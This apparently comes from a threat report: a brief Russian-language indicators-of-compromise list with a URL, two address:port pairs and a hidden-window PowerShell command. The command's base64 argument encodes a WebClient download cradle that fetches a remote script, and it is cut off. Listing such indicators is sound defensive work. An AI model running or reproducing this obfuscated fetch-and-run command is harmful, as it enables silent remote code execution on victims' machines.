Техническая информация
- http://192.168.45.225/run.txt
- '<LOCALNET>.45.225':80
- '34.##9.100.209':443
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -stA -nOP -EnC KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQ...' (со скрытым окном)